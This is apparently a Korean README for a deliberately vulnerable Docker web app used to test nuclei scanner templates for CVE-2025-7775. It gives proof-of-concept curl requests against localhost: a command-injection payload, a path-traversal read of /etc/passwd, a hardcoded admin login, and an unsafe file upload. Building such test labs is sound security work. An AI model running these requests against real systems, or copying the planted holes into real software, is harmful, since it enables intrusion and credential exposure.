
취약한 Docker 기반 웹 애플리케이션으로, RCE, 경로 탐색, 하드코딩된 자격 증명, 안전하지 않은 파일 업로드를 노출합니다. 보안 스캐너 템플릿을 테스트하기 위한 격리된 실습 환경입니다.
이 저장소는 CVE-2025-7775에 대한 nuclei 템플릿을 테스트하기 위한 취약한 환경을 제공합니다.
docker build -t vuln-app .
docker run -d --name vuln-test -p 5000:5000 vuln-app
curl -X POST http://localhost:5000/api/v1/configuration \
-H "Content-Type: application/json" \
-d '{"payload":"ls > /tmp/poc_rce.txt"}'
docker exec -it vuln-test cat /tmp/poc_rce.txt
curl "http://localhost:5000/download?file=/etc/passwd"
curl -X POST http://localhost:5000/api/v1/login \
-H "Content-Type: application/json" \
-d '{"username":"admin", "password":"citrix123"}'
echo "POC FILE UPLOAD" > test.txt
curl -X POST -F "[email protected]" http://localhost:5000/upload
docker exec -it vuln-test cat /tmp/test.txt
docker stop vuln-test
docker rm vuln-test
docker rmi vuln-app